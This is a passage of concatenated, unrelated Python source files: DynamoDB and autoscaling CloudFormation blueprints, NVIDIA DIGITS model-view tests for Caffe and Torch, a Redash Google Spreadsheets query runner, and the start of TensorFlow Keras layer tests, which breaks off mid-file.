ProvisionedThroughput:
ReadCapacityUnits: 5
WriteCapacityUnits: 5
StreamSpecification:
StreamViewType: ALL
"""
VARIABLES = {
"Tables": {
"type": TroposphereType(dynamodb.Table, many=True),
"description": "DynamoDB tables to create.",
}
}
def create_template(self):
t = self.template
variables = self.get_variables()
for table in variables["Tables"]:
t.add_resource(table)
stream_enabled = table.properties.get("StreamSpecification")
if stream_enabled:
t.add_output(Output("{}StreamArn".format(table.title),
Value=GetAtt(table, "StreamArn")))
t.add_output(Output("{}Name".format(table.title),
Value=Ref(table)))
class AutoScaling(Blueprint):
"""Manages the AutoScaling of DynamoDB tables.
Ref: https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-examples-application-autoscaling # noqa
Example::
- name: dynamodb-autoscaling
class_path: stacker_blueprints.dynamodb.AutoScaling
variables:
AutoScalingConfigs:
- table: test-user-table
read:
min: 5
max: 100
target: 75.0
write:
min: 5
max: 50
target: 80.0
- table: test-group-table
read:
min: 10
max: 50
scale-in-cooldown: 180
scale-out-cooldown: 180
write:
max: 25
"""
VARIABLES = {
"AutoScalingConfigs": {
"type": list,
"description": "A list of dicts, each of which represent "
"a DynamoDB AutoScaling Configuration.",
}
}
# reference: https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-dynamodb-table.html#cfn-dynamodb-table-examples-application-autoscaling # noqa
def create_scaling_iam_role(self):
assumerole_policy = get_application_autoscaling_assumerole_policy()
return self.template.add_resource(
iam.Role(
"Role",
Policies=[
iam.Policy(
PolicyName=Sub(
"${AWS::StackName}-dynamodb-autoscaling"
),
PolicyDocument=dynamodb_autoscaling_policy(self.tables)
)
],
AssumeRolePolicyDocument=assumerole_policy
)
)
def create_scalable_target_and_scaling_policy(self, table, asc, capacity_type="read"): # noqa
capacity_type = capacity_type.title()
if capacity_type not in ("Read", "Write"):
raise Exception("capacity_type must be either `read` or `write`.")
dimension = "dynamodb:table:{}CapacityUnits".format(capacity_type)
camel_table = snake_to_camel_case(table)
scalable_target_name = "{}{}ScalableTarget".format(
camel_table,
capacity_type,
)
scalable_target = self.template.add_resource(
aas.ScalableTarget(
scalable_target_name,
MinCapacity=asc.get("min", 1),
MaxCapacity=asc.get("max", 1000),
ResourceId="table/{}".format(table),
RoleARN=self.iam_role_arn,
ScalableDimension=dimension,
ServiceNamespace="dynamodb"
)
)
# https://docs.aws.amazon.com/autoscaling/application/APIReference/API_PredefinedMetricSpecification.html # noqa
predefined_metric_spec = aas.PredefinedMetricSpecification(
PredefinedMetricType="DynamoDB{}CapacityUtilization".format(
capacity_type
)
)
ttspc = aas.TargetTrackingScalingPolicyConfiguration(
TargetValue=asc.get("target", 50.0),
ScaleInCooldown=asc.get("scale-in-cooldown", 60),
ScaleOutCooldown=asc.get("scale-out-cooldown", 60),
PredefinedMetricSpecification=predefined_metric_spec,
)
scaling_policy_name = "{}{}ScalablePolicy".format(
camel_table,
capacity_type,
)
# dynamodb only supports TargetTrackingScaling polcy type.
# https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-applicationautoscaling-scalingpolicy.html#cfn-applicationautoscaling-scalingpolicy-policytype # noqa
self.template.add_resource(
aas.ScalingPolicy(
scaling_policy_name,
PolicyName=scaling_policy_name,
PolicyType="TargetTrackingScaling",
ScalingTargetId=scalable_target.ref(),
TargetTrackingScalingPolicyConfiguration=ttspc,
)
)
def create_template(self):
variables = self.get_variables()
self.auto_scaling_configs = variables["AutoScalingConfigs"]
self.tables = [config["table"] for config in self.auto_scaling_configs]
self.iam_role = self.create_scaling_iam_role()
self.iam_role_arn = GetAtt(self.iam_role, "Arn")
for table_asc in self.auto_scaling_configs:
self.create_scalable_target_and_scaling_policy(
table_asc["table"], table_asc["read"], "read"
)
self.create_scalable_target_and_scaling_policy(
table_asc["table"], table_asc["write"], "write"
)
| |
# Copyright (c) 2015, NVIDIA CORPORATION. All rights reserved.
import re
import os
import json
import shutil
import tempfile
import time
import unittest
import itertools
import urllib
import mock
import flask
from gevent import monkey
monkey.patch_all()
from bs4 import BeautifulSoup
import PIL.Image
from urlparse import urlparse
from cStringIO import StringIO
import caffe_pb2
import digits.webapp
import digits.test_views
import digits.dataset.images.generic.test_views
from digits.config import config_value
# May be too short on a slow system
TIMEOUT_DATASET = 45
TIMEOUT_MODEL = 60
################################################################################
# Base classes (they don't start with "Test" so nose won't run them)
################################################################################
class BaseViewsTest(digits.test_views.BaseViewsTest):
"""
Provides some functions
"""
CAFFE_NETWORK = \
"""
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scale"
power_param {
scale: 0.004
}
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scale"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "train_loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
}
"""
TORCH_NETWORK = \
"""
return function(p)
local nDim = 1
if p.inputShape then p.inputShape:apply(function(x) nDim=nDim*x end) end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer = nn.Linear(nDim, 2)
linearLayer.weight:fill(0)
linearLayer.bias:fill(0)
net:add(linearLayer) -- c*h*w -> 2
return {
model = net,
loss = nn.MSECriterion(),
}
end
"""
@classmethod
def setUpClass(cls):
super(BaseViewsTest, cls).setUpClass()
if cls.FRAMEWORK=='torch' and not config_value('torch_root'):
raise unittest.SkipTest('Torch not found')
@classmethod
def model_exists(cls, job_id):
return cls.job_exists(job_id, 'models')
@classmethod
def model_status(cls, job_id):
return cls.job_status(job_id, 'models')
@classmethod
def abort_model(cls, job_id):
return cls.abort_job(job_id, job_type='models')
@classmethod
def model_wait_completion(cls, job_id, **kwargs):
kwargs['job_type'] = 'models'
if 'timeout' not in kwargs:
kwargs['timeout'] = TIMEOUT_MODEL
return cls.job_wait_completion(job_id, **kwargs)
@classmethod
def delete_model(cls, job_id):
return cls.delete_job(job_id, job_type='models')
@classmethod
def network(cls):
return cls.TORCH_NETWORK if cls.FRAMEWORK=='torch' else cls.CAFFE_NETWORK
class BaseViewsTestWithDataset(BaseViewsTest,
digits.dataset.images.generic.test_views.BaseViewsTestWithDataset):
"""
Provides a dataset
"""
# Inherited classes may want to override these attributes
CROP_SIZE = None
TRAIN_EPOCHS = 3
LR_POLICY = None
LEARNING_RATE = None
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithDataset, cls).setUpClass()
cls.created_models = []
@classmethod
def tearDownClass(cls):
# delete any created datasets
for job_id in cls.created_models:
cls.delete_model(job_id)
super(BaseViewsTestWithDataset, cls).tearDownClass()
@classmethod
def create_model(cls, learning_rate=None, **kwargs):
"""
Create a model
Returns the job_id
Raise RuntimeError if job fails to create
Keyword arguments:
**kwargs -- data to be sent with POST request
"""
if learning_rate is None:
learning_rate = cls.LEARNING_RATE
data = {
'model_name': 'test_model',
'dataset': cls.dataset_id,
'method': 'custom',
'custom_network': cls.network(),
'batch_size': 10,
'train_epochs': cls.TRAIN_EPOCHS,
'random_seed': 0xCAFEBABE,
'framework': cls.FRAMEWORK,
}
if cls.CROP_SIZE is not None:
data['crop_size'] = cls.CROP_SIZE
if cls.LR_POLICY is not None:
data['lr_policy'] = cls.LR_POLICY
if learning_rate is not None:
data['learning_rate'] = learning_rate
data.update(kwargs)
request_json = data.pop('json', False)
url = '/models/images/generic'
if request_json:
url += '.json'
rv = cls.app.post(url, data=data)
if request_json:
if rv.status_code != 200:
print json.loads(rv.data)
raise RuntimeError('Model creation failed with %s' % rv.status_code)
return json.loads(rv.data)['id']
# expect a redirect
if not 300 <= rv.status_code <= 310:
print 'Status code:', rv.status_code
s = BeautifulSoup(rv.data, 'html.parser')
div = s.select('div.alert-danger')
if div:
raise RuntimeError(div[0])
else:
raise RuntimeError('Failed to create model')
job_id = cls.job_id_from_response(rv)
assert cls.model_exists(job_id), 'model not found after successful creation'
cls.created_models.append(job_id)
return job_id
class BaseViewsTestWithModel(BaseViewsTestWithDataset):
"""
Provides a model
"""
@classmethod
def setUpClass(cls):
super(BaseViewsTestWithModel, cls).setUpClass()
cls.model_id = cls.create_model(json=True)
assert cls.model_wait_completion(cls.model_id) == 'Done', 'create failed'
class BaseTestViews(BaseViewsTest):
"""
Tests which don't require a dataset or a model
"""
def test_page_model_new(self):
rv = self.app.get('/models/images/generic/new')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'New Image Model' in rv.data, 'unexpected page format'
def test_nonexistent_model(self):
assert not self.model_exists('foo'), "model shouldn't exist"
def test_visualize_network(self):
rv = self.app.post('/models/visualize-network?framework='+self.FRAMEWORK,
data = {'custom_network': self.network()}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
if rv.status_code != 200:
body = s.select('body')[0]
if 'InvocationException' in str(body):
raise unittest.SkipTest('GraphViz not installed')
raise AssertionError('POST failed with %s\n\n%s' % (rv.status_code, body))
image = s.select('img')
assert image is not None, "didn't return an image"
class BaseTestCreation(BaseViewsTestWithDataset):
"""
Model creation tests
"""
def test_create_json(self):
job_id = self.create_model(json=True)
self.abort_model(job_id)
def test_create_delete(self):
job_id = self.create_model()
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
def test_create_wait_delete(self):
job_id = self.create_model()
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
def test_create_abort_delete(self):
job_id = self.create_model()
assert self.abort_model(job_id) == 200, 'abort failed'
assert self.delete_model(job_id) == 200, 'delete failed'
assert not self.model_exists(job_id), 'model exists after delete'
def test_snapshot_interval_2(self):
job_id = self.create_model(snapshot_interval=0.5)
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
rv = self.app.get('/models/%s.json' % job_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']) > 1, 'should take >1 snapshot'
def test_snapshot_interval_0_5(self):
job_id = self.create_model(train_epochs=4, snapshot_interval=2)
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
rv = self.app.get('/models/%s.json' % job_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']) == 2, 'should take 2 snapshots'
@unittest.skipIf(
not config_value('gpu_list'),
'no GPUs selected')
@unittest.skipIf(
not config_value('caffe_root')['cuda_enabled'],
'CUDA disabled')
@unittest.skipIf(
config_value('caffe_root')['multi_gpu'],
'multi-GPU enabled')
def test_select_gpu(self):
for index in config_value('gpu_list').split(','):
yield self.check_select_gpu, index
def check_select_gpu(self, gpu_index):
job_id = self.create_model(select_gpu=gpu_index)
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
@unittest.skipIf(
not config_value('gpu_list'),
'no GPUs selected')
@unittest.skipIf(
not config_value('caffe_root')['cuda_enabled'],
'CUDA disabled')
@unittest.skipIf(
not config_value('caffe_root')['multi_gpu'],
'multi-GPU disabled')
def test_select_gpus(self):
# test all possible combinations
gpu_list = config_value('gpu_list').split(',')
for i in xrange(len(gpu_list)):
for combination in itertools.combinations(gpu_list, i+1):
yield self.check_select_gpus, combination
def check_select_gpus(self, gpu_list):
job_id = self.create_model(select_gpus_list=','.join(gpu_list), batch_size=len(gpu_list))
assert self.model_wait_completion(job_id) == 'Done', 'create failed'
def infer_one_for_job(self, job_id):
# carry out one inference test per category in dataset
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path,'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one?job_id=%s' % job_id,
data = {
'image_file': image_upload,
'show_visualizations': 'y',
}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
def test_infer_one_mean_image(self):
# test the creation
job_id = self.create_model(use_mean = 'image')
assert self.model_wait_completion(job_id) == 'Done', 'job failed'
self.infer_one_for_job(job_id)
def test_infer_one_mean_pixel(self):
# test the creation
job_id = self.create_model(use_mean = 'pixel')
assert self.model_wait_completion(job_id) == 'Done', 'job failed'
self.infer_one_for_job(job_id)
def test_infer_one_mean_none(self):
# test the creation
job_id = self.create_model(use_mean = 'none')
assert self.model_wait_completion(job_id) == 'Done', 'job failed'
self.infer_one_for_job(job_id)
def test_retrain(self):
job1_id = self.create_model()
assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/models/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']), 'should have at least snapshot'
options = {
'method': 'previous',
'previous_networks': job1_id,
}
options['%s-snapshot' % job1_id] = content['snapshots'][-1]
job2_id = self.create_model(**options)
assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
def test_retrain_twice(self):
# retrain from a job which already had a pretrained model
job1_id = self.create_model()
assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/models/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert len(content['snapshots']), 'should have at least snapshot'
options_2 = {
'method': 'previous',
'previous_networks': job1_id,
}
options_2['%s-snapshot' % job1_id] = content['snapshots'][-1]
job2_id = self.create_model(**options_2)
assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
options_3 = {
'method': 'previous',
'previous_networks': job2_id,
}
options_3['%s-snapshot' % job2_id] = -1
job3_id = self.create_model(**options_3)
assert self.model_wait_completion(job3_id) == 'Done', 'third job failed'
def test_diverging_network(self):
if self.FRAMEWORK == 'caffe':
raise unittest.SkipTest('Test not implemented for Caffe')
job_id = self.create_model(json=True, learning_rate=1e15)
assert self.model_wait_completion(job_id) == 'Error', 'job should have failed'
job_info = self.job_info_html(job_id=job_id, job_type='models')
assert 'Try decreasing your learning rate' in job_info
def test_clone(self):
options_1 = {
'shuffle': True,
'lr_step_size': 33.0,
'previous_networks': 'None',
'lr_inv_power': 0.5,
'lr_inv_gamma': 0.1,
'lr_poly_power': 3.0,
'lr_exp_gamma': 0.95,
'use_mean': 'image',
'custom_network_snapshot': '',
'lr_multistep_gamma': 0.5,
'lr_policy': 'step',
'crop_size': None,
'val_interval': 3.0,
'random_seed': 123,
'learning_rate': 0.01,
'standard_networks': 'None',
'lr_step_gamma': 0.1,
'lr_sigmoid_step': 50.0,
'lr_sigmoid_gamma': 0.1,
'lr_multistep_values': '50,85',
'solver_type': 'SGD',
}
job1_id = self.create_model(**options_1)
assert self.model_wait_completion(job1_id) == 'Done', 'first job failed'
rv = self.app.get('/models/%s.json' % job1_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content1 = json.loads(rv.data)
## Clone job1 as job2
options_2 = {
'clone': job1_id,
}
job2_id = self.create_model(**options_2)
assert self.model_wait_completion(job2_id) == 'Done', 'second job failed'
rv = self.app.get('/models/%s.json' % job2_id)
assert rv.status_code == 200, 'json load failed with %s' % rv.status_code
content2 = json.loads(rv.data)
## These will be different
content1.pop('id')
content2.pop('id')
content1.pop('directory')
content2.pop('directory')
assert (content1 == content2), 'job content does not match'
job1 = digits.webapp.scheduler.get_job(job1_id)
job2 = digits.webapp.scheduler.get_job(job2_id)
assert (job1.form_data == job2.form_data), 'form content does not match'
class BaseTestCreated(BaseViewsTestWithModel):
"""
Tests on a model that has already been created
"""
def test_save(self):
job = digits.webapp.scheduler.get_job(self.model_id)
assert job.save(), 'Job failed to save'
def test_download(self):
for extension in ['tar', 'zip', 'tar.gz', 'tar.bz2']:
yield self.check_download, extension
def check_download(self, extension):
url = '/models/%s/download.%s' % (self.model_id, extension)
rv = self.app.get(url)
assert rv.status_code == 200, 'download "%s" failed with %s' % (url, rv.status_code)
def test_index_json(self):
rv = self.app.get('/index.json')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
found = False
for m in content['models']:
if m['id'] == self.model_id:
found = True
break
assert found, 'model not found in list'
def test_models_page(self):
rv = self.app.get('/models', follow_redirects=True)
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'Models' in rv.data, 'unexpected page format'
def test_model_json(self):
rv = self.app.get('/models/%s.json' % self.model_id)
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert content['id'] == self.model_id, 'expected different job_id'
assert len(content['snapshots']) > 0, 'no snapshots in list'
def test_edit_name(self):
status = self.edit_job(
self.dataset_id,
name='new name'
)
assert status == 200, 'failed with %s' % status
def test_edit_notes(self):
status = self.edit_job(
self.dataset_id,
notes='new notes'
)
assert status == 200, 'failed with %s' % status
def test_infer_one(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path,'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one?job_id=%s' % self.model_id,
data = {
'image_file': image_upload,
'show_visualizations': 'y',
}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
def test_infer_one_json(self):
image_path = os.path.join(self.imageset_folder, self.test_image)
with open(image_path,'rb') as infile:
# StringIO wrapping is needed to simulate POST file upload.
image_upload = (StringIO(infile.read()), 'image.png')
rv = self.app.post(
'/models/images/generic/infer_one.json?job_id=%s' % self.model_id,
data = {
'image_file': image_upload,
}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
assert data['outputs']['output'][0][0] > 0 and \
data['outputs']['output'][0][1] > 0, \
'image regression result is wrong: %s' % data['outputs']['output']
def test_infer_many(self):
textfile_images = '%s\n' % self.test_image
# StringIO wrapping is needed to simulate POST file upload.
file_upload = (StringIO(textfile_images), 'images.txt')
rv = self.app.post(
'/models/images/generic/infer_many?job_id=%s' % self.model_id,
data = {'image_list': file_upload}
)
s = BeautifulSoup(rv.data, 'html.parser')
body = s.select('body')
assert rv.status_code == 200, 'POST failed with %s\n\n%s' % (rv.status_code, body)
headers = s.select('table.table th')
assert headers is not None, 'unrecognized page format'
def test_infer_many_json(self):
textfile_images = '%s\n' % self.test_image
# StringIO wrapping is needed to simulate POST file upload.
file_upload = (StringIO(textfile_images), 'images.txt')
rv = self.app.post(
'/models/images/generic/infer_many.json?job_id=%s' % self.model_id,
data = {'image_list': file_upload}
)
assert rv.status_code == 200, 'POST failed with %s' % rv.status_code
data = json.loads(rv.data)
assert 'outputs' in data, 'invalid response'
class BaseTestDatasetModelInteractions(BaseViewsTestWithDataset):
"""
Test the interactions between datasets and models
"""
# If you try to create a model using a deleted dataset, it should fail
def test_create_model_deleted_dataset(self):
dataset_id = self.create_dataset()
assert self.delete_dataset(dataset_id) == 200, 'delete failed'
assert not self.dataset_exists(dataset_id), 'dataset exists after delete'
try:
model_id = self.create_model(dataset=dataset_id)
except RuntimeError:
return
assert False, 'Should have failed'
# If you try to create a model using a running dataset,
# it should wait to start until the dataset is completed
def test_create_model_running_dataset(self):
dataset_id = self.create_dataset()
model_id = self.create_model(dataset=dataset_id)
# Model should be in WAIT status while dataset is running
# Copying functionality from job_wait_completion ...
start_time = time.time()
timeout = TIMEOUT_DATASET
dataset_status = self.dataset_status(dataset_id)
while dataset_status != 'Done':
model_status = self.model_status(model_id)
if model_status == 'Initialized':
# give it some time ...
pass
elif model_status == 'Waiting':
# That's what we were waiting for
break
else:
raise Exception('Model not waiting - "%s"' % model_status)
assert (time.time() - start_time) < timeout, 'Job took more than %s seconds' % timeout
time.sleep(0.5)
dataset_status = self.dataset_status(dataset_id)
# Model should switch to RUN status after dataset is DONE
assert self.dataset_wait_completion(dataset_id) == 'Done', 'dataset creation failed'
time.sleep(1)
assert self.model_status(model_id) in ['Running', 'Done'], "model didn't start"
self.abort_model(model_id)
# If you try to delete a completed dataset with a dependent model, it should fail
def test_delete_dataset_dependent_model(self):
dataset_id = self.create_dataset()
model_id = self.create_model(dataset=dataset_id)
assert self.dataset_wait_completion(dataset_id) == 'Done', 'dataset creation failed'
assert self.delete_dataset(dataset_id) == 403, 'dataset deletion should not have succeeded'
self.abort_model(model_id)
# If you try to delete a running dataset with a dependent model, it should fail
def test_delete_running_dataset_dependent_model(self):
dataset_id = self.create_dataset()
model_id = self.create_model(dataset=dataset_id)
assert self.delete_dataset(dataset_id) == 403, 'dataset deletion should not have succeeded'
self.abort_dataset(dataset_id)
self.abort_model(model_id)
class BaseTestCreatedCropInNetwork(BaseTestCreated):
CAFFE_NETWORK = \
"""
layer {
name: "data"
type: "Data"
top: "data"
include {
phase: TRAIN
}
transform_param {
crop_size: 8
}
}
layer {
name: "data"
type: "Data"
top: "data"
include {
phase: TEST
}
transform_param {
crop_size: 8
}
}
layer {
name: "scale"
type: "Power"
bottom: "data"
top: "scale"
power_param {
scale: 0.004
}
}
layer {
name: "hidden"
type: "InnerProduct"
bottom: "scale"
top: "output"
inner_product_param {
num_output: 2
}
}
layer {
name: "train_loss"
type: "EuclideanLoss"
bottom: "output"
bottom: "label"
top: "loss"
}
"""
TORCH_NETWORK = \
"""
return function(p)
local croplen = 8, channels
if p.inputShape then channels=p.inputShape[1] else channels=1 end
local net = nn.Sequential()
net:add(nn.MulConstant(0.004))
net:add(nn.View(-1):setNumInputDims(3)) -- flatten
-- set all weights and biases to zero as this speeds learning up
-- for the type of problem we're trying to solve in this test
local linearLayer = nn.Linear(channels*croplen*croplen, 2)
linearLayer.weight:fill(0)
linearLayer.bias:fill(0)
net:add(linearLayer) -- c*croplen*croplen -> 2
return {
model = net,
loss = nn.MSECriterion(),
croplen = croplen
}
end
"""
class BaseTestCreatedCropInForm(BaseTestCreated):
CROP_SIZE = 8
################################################################################
# Test classes
################################################################################
class TestCaffeViews(BaseTestViews):
FRAMEWORK = 'caffe'
class TestCaffeCreation(BaseTestCreation):
FRAMEWORK = 'caffe'
class TestCaffeCreated(BaseTestCreated):
FRAMEWORK = 'caffe'
class TestCaffeDatasetModelInteractions(BaseTestDatasetModelInteractions):
FRAMEWORK = 'caffe'
class TestCaffeCreatedCropInNetwork(BaseTestCreatedCropInNetwork):
FRAMEWORK = 'caffe'
class TestCaffeCreatedCropInForm(BaseTestCreatedCropInForm):
FRAMEWORK = 'caffe'
class TestTorchViews(BaseTestViews):
FRAMEWORK = 'torch'
class TestTorchCreation(BaseTestCreation):
FRAMEWORK = 'torch'
class TestTorchCreated(BaseTestCreated):
FRAMEWORK = 'torch'
class TestTorchCreatedCropInNetwork(BaseTestCreatedCropInNetwork):
FRAMEWORK = 'torch'
class TestTorchCreatedCropInForm(BaseTestCreatedCropInForm):
FRAMEWORK = 'torch'
class TestTorchDatasetModelInteractions(BaseTestDatasetModelInteractions):
FRAMEWORK = 'torch'
| |
import json
import logging
from base64 import b64decode
from dateutil import parser
from requests import Session
from redash.query_runner import *
from redash.utils import JSONEncoder
logger = logging.getLogger(__name__)
try:
import gspread
from gspread.httpsession import HTTPSession
from oauth2client.service_account import ServiceAccountCredentials
enabled = True
except ImportError:
enabled = False
def _load_key(filename):
with open(filename, "rb") as f:
return json.loads(f.read())
def _guess_type(value):
if value == '':
return TYPE_STRING
try:
val = int(value)
return TYPE_INTEGER
except ValueError:
pass
try:
val = float(value)
return TYPE_FLOAT
except ValueError:
pass
if unicode(value).lower() in ('true', 'false'):
return TYPE_BOOLEAN
try:
val = parser.parse(value)
return TYPE_DATETIME
except (ValueError, OverflowError):
pass
return TYPE_STRING
def _value_eval_list(value):
value_list = []
for member in value:
if member == '' or member is None:
val = None
value_list.append(val)
continue
try:
val = int(member)
value_list.append(val)
continue
except ValueError:
pass
try:
val = float(member)
value_list.append(val)
continue
except ValueError:
pass
if unicode(member).lower() in ('true', 'false'):
if unicode(member).lower() == 'true':
value_list.append(True)
else:
value_list.append(False)
continue
try:
val = parser.parse(member)
value_list.append(val)
continue
except (ValueError, OverflowError):
pass
value_list.append(member)
return value_list
HEADER_INDEX = 0
class WorksheetNotFoundError(Exception):
def __init__(self, worksheet_num, worksheet_count):
message = "Worksheet number {} not found. Spreadsheet has {} worksheets. Note that the worksheet count is zero based.".format(worksheet_num, worksheet_count)
super(WorksheetNotFoundError, self).__init__(message)
def parse_worksheet(worksheet):
if not worksheet:
return {'columns': [], 'rows': []}
column_names = []
columns = []
duplicate_counter = 1
for j, column_name in enumerate(worksheet[HEADER_INDEX]):
if column_name in column_names:
column_name = u"{}{}".format(column_name, duplicate_counter)
duplicate_counter += 1
column_names.append(column_name)
columns.append({
'name': column_name,
'friendly_name': column_name,
'type': TYPE_STRING
})
if len(worksheet) > 1:
for j, value in enumerate(worksheet[HEADER_INDEX + 1]):
columns[j]['type'] = _guess_type(value)
rows = [dict(zip(column_names, _value_eval_list(row))) for row in worksheet[HEADER_INDEX + 1:]]
data = {'columns': columns, 'rows': rows}
return data
def parse_spreadsheet(spreadsheet, worksheet_num):
worksheets = spreadsheet.worksheets()
worksheet_count = len(worksheets)
if worksheet_num >= worksheet_count:
raise WorksheetNotFoundError(worksheet_num, worksheet_count)
worksheet = worksheets[worksheet_num].get_all_values()
return parse_worksheet(worksheet)
class TimeoutSession(Session):
def request(self, *args, **kwargs):
kwargs.setdefault('timeout', 300)
return super(TimeoutSession, self).request(*args, **kwargs)
class GoogleSpreadsheet(BaseQueryRunner):
@classmethod
def annotate_query(cls):
return False
@classmethod
def type(cls):
return "google_spreadsheets"
@classmethod
def enabled(cls):
return enabled
@classmethod
def configuration_schema(cls):
return {
'type': 'object',
'properties': {
'jsonKeyFile': {
"type": "string",
'title': 'JSON Key File'
}
},
'required': ['jsonKeyFile'],
'secret': ['jsonKeyFile']
}
def __init__(self, configuration):
super(GoogleSpreadsheet, self).__init__(configuration)
def _get_spreadsheet_service(self):
scope = [
'https://spreadsheets.google.com/feeds',
]
key = json.loads(b64decode(self.configuration['jsonKeyFile']))
creds = ServiceAccountCredentials.from_json_keyfile_dict(key, scope)
timeout_session = HTTPSession()
timeout_session.requests_session = TimeoutSession()
spreadsheetservice = gspread.Client(auth=creds, http_session=timeout_session)
spreadsheetservice.login()
return spreadsheetservice
def test_connection(self):
self._get_spreadsheet_service()
def run_query(self, query, user):
logger.debug("Spreadsheet is about to execute query: %s", query)
values = query.split("|")
key = values[0] # key of the spreadsheet
worksheet_num = 0 if len(values) != 2 else int(values[1]) # if spreadsheet contains more than one worksheet - this is the number of it
try:
spreadsheet_service = self._get_spreadsheet_service()
spreadsheet = spreadsheet_service.open_by_key(key)
data = parse_spreadsheet(spreadsheet, worksheet_num)
json_data = json.dumps(data, cls=JSONEncoder)
error = None
except gspread.SpreadsheetNotFound:
error = "Spreadsheet ({}) not found. Make sure you used correct id.".format(key)
json_data = None
return json_data, error
register(GoogleSpreadsheet)
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TensorFlow 2.0 layer behavior."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
import sys
import traceback
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import backend
from tensorflow.python.keras import combinations
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import layers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import input_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.engine import training as training_lib
from tensorflow.python.keras.mixed_precision.experimental import policy
from tensorflow.python.keras.optimizer_v2 import rmsprop
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.layers import core as legacy_core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.util import nest
class DynamicLayer(base_layer.Layer):
def __init__(self, dynamic=False, **kwargs):
super(DynamicLayer, self).__init__(dynamic=dynamic, **kwargs)
def call(self, inputs):
samples = tensor_array_ops.TensorArray(
dtype=dtypes.float32, size=array_ops.shape(inputs)[0])
for idx, sample in enumerate(inputs):
samples = samples.write(idx, math_ops.square(sample))
return samples.stack()
def compute_output_shape(self, input_shape):
return input_shape
class InvalidLayer(base_layer.Layer):
def call(self, inputs):
raise ValueError('You did something wrong!')
class BaseLayerTest(keras_parameterized.TestCase):
@combinations.generate(combinations.keras_model_type_combinations())
def test_dynamic_layer(self):
model = testing_utils.get_model_from_layers([DynamicLayer(dynamic=True)],
input_shape=(3,))
self.assertEqual(model.dynamic, True)
model.compile(rmsprop.RMSprop(0.001), loss='mse')
